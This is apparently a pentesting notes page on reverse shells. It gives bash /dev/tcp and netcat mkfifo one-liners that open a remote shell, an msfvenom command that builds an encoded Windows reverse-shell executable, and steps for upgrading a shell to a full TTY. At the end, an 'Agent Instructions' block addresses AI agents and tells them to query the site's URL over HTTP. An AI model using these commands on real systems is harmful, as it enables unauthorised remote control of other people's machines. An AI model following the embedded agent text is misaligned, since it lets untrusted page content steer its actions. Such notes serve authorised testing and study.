# Reverse Shell ## One-Liners #### Bash ```bash bash -i >& /dev/tcp// 0>&1 ``` #### Netcat ``` rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f ``` Sometimes one one-liner won't work, but another will. Two great cheatsheets are [pentestmonkey ](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)and [highoncoffee](https://highon.coffee/blog/reverse-shell-cheat-sheet/). ## Generate Payload ### Msfvenom #### Windows reverse shell with encoder ``` msfvenom -p windows/shell_reverse_tcp -a x86 --encoder /x86/shikata_ga_nai LHOST= LPORT= -f exe -o .exe ``` ## Shell Cushions If the reverse shell is terminal-based some measures can be taken to make it more comfortable to use. ### Spawn TTY #### Python ``` python -c ‘import pty;pty.spawn(“/bin/bash”)’ ``` [Additional](https://netsec.ws/?p=337) ways to spawn TTY. ### Auto-Completion Background the process with Ctrl+z. Execute this to disable echoing and send I/O straight through without processing. ``` stty raw -echo ``` return to the process with fg + Enter x2. [Additional cushions](https://medium.com/bugbountywriteup/pimp-my-shell-5-ways-to-upgrade-a-netcat-shell-ecd551a180d2). --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://nickbhe.gitbook.io/shikata-ga-nai-1/gaining-access/reverse-shell.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.